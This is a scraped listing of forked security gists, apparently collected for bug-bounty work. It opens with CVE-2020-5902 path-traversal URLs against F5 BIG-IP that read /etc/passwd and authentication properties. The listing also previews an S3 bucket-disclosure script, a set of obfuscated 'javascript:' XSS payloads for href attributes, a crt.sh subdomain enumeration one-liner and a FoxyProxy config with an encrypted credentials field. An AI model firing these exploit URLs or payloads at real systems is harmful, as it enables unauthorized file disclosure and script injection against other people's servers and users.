https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwdhttps://{host}/tmui/login.jsp/..;/tmui/system/user/authproperties.jsphttps://{host}/tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=jaffa
vxrv
/ bucket-disclose.sh
Created
October 11, 2020 16:41
— forked from fransr/bucket-disclose.sh
Using error messages to decloak an S3 bucket. Uses soap, unicode, post, multipart, streaming and index listing as ways of figure it out. You do need a valid aws-key (never the secret) to properly get the error messages
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # Written by Frans Rosén (twitter.com/fransrosen) | |
| _debug="$2" #turn on debug | |
| _timeout="20" | |
| #you need a valid key, since the errors happens after it validates that the key exist. we do not need the secret key, only access key | |
| _aws_key="AKIA..." | |
| H_ACCEPT="accept-language: en-US,en;q=0.9,sv;q=0.8,zh-TW;q=0.7,zh;q=0.6,fi;q=0.5,it;q=0.4,de;q=0.3" | |
| H_AGENT="user-agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Safari/537.36" |
vxrv
/ href_bypass.html
Created
July 24, 2020 02:10
— forked from hackerscrolls/href_bypass.html
XSS payloads for href
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!--javascript --> | |
| ja	vascript:alert(1) | |
| ja
vascript:alert(1) | |
| ja
vascript:alert(1) | |
| javascript:alert() | |
| <!--::colon:: --> | |
| javascript:alert() | |
| javascript:alert() | |
| javascript:alert(1) |
vxrv
/ LazyCrtUrlGrab.sh
Created
July 12, 2020 08:41
— forked from IAmStoxe/LazyCrtUrlGrab.sh
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| curl -s 'https://crt.sh/?q=%25.DOMAIN_NAME_HERE.com&output=json' \ | |
| | jq -r '.[].name_value' \ | |
| | sed 's/\*\.//g' \ | |
| | sort -u \ | |
| | xargs -L1 -I % sh -c './main --ignore-ssl --json="./tmp/%.json" --url="%"' |
vxrv
/ CVE-2020-5902.md
Created
July 5, 2020 21:46
— forked from cihanmehmet/CVE-2020-5902.md
BIGIP CVE-2020-5902 Exploit POC
vxrv
/ bb-foxyproxy-pattern.json
Created
June 24, 2020 14:14
— forked from ignis-sec/bb-foxyproxy-pattern.json
foxyproxy pattern (install Storage area explorer and import this file, foxyproxy import/export is broken)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| { | |
| "30523382": { | |
| "className": "Proxy", | |
| "data": { | |
| "bypassFPForPAC": true, | |
| "color": "#f57575", | |
| "configUrl": "", | |
| "credentials": "U2FsdGVkX1+tf3lvD5TBClW2UUSZAT4AWsCo/i0kU2M=", | |
| "cycle": false, | |
| "enabled": true, |